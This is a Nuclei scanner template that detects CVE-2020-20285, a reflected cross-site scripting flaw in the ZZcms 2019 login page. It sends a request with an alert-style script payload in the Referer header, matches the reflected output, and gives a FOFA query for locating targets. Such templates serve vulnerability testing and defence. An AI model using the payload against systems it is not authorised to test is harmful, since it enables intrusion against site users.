nuclei-templates/cves/2020/CVE-2020-20285.yaml

46 lines
1.2 KiB
YAML

id: CVE-2020-20285
info:
name: ZZcms - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.
reference:
- https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-20285
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-20285
cwe-id: CWE-79
metadata:
fofa-query: zzcms
verified: "true"
tags: cve,cve2020,zzcms,xss
requests:
- raw:
- |
GET /user/login.php HTTP/1.1
Host: {{Hostname}}
Referer: xss"/><img src="#" onerror="alert(document.domain)"/>
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'fromurl" type="hidden" value="xss"/><img src="#" onerror="alert(document.domain)"/>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by md on 2022/10/17